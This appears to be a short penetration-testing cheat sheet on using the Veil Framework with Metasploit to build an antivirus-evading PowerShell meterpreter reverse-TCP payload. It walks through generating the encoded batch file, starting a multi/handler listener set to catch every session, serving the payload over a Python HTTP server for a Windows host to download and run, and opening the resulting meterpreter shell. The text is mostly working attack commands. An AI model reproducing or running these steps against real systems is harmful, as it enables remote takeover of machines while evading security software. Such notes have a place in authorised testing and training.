Veil
REF: Metasploit
Veil Framework
Evasion ..creates payload w/evasion
Ordinance ..Quickly gen shellcode for exp/pay
Shellter ..Other software
Usage
sudo veil
use Evasion
list ..see all the payloads
<tab> <tab> ..view options
info powershell/meterpreter/rev_tcp.py
use powershell/meterpreter/rev_tcp.py
set LHOST 10.x.x.x (tab complete)
generate ..give it a name: veil
Created:
/var/lib/veil/output/source/veil.bat ..base64 encoded
/var/lib/veil/output/handlers/veil.rc ..For MSF
Metasploit Scripting
msfconsole -r /var/lib/veil/output/handlers/veil.rc
jobs ..see that it is running/waiting
Autoloaded this:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.x.x.x
set LPORT 4444
set ExitOnSession false ..catch all sessions!!
exploit -j
Execution
Kali:
cd /var/lib/veil/output/source/
ls veil.bat
> python3 -m http.server
Windows:
http://$IP:8000/veil.bat ..save/open/execute
Kali: Connected!
session -l
sessions -i 1
meterpreter> getuid
sysinfo
Win!
Example:
Veil-Evasion used in coldfusion
Last updated
Was this helpful?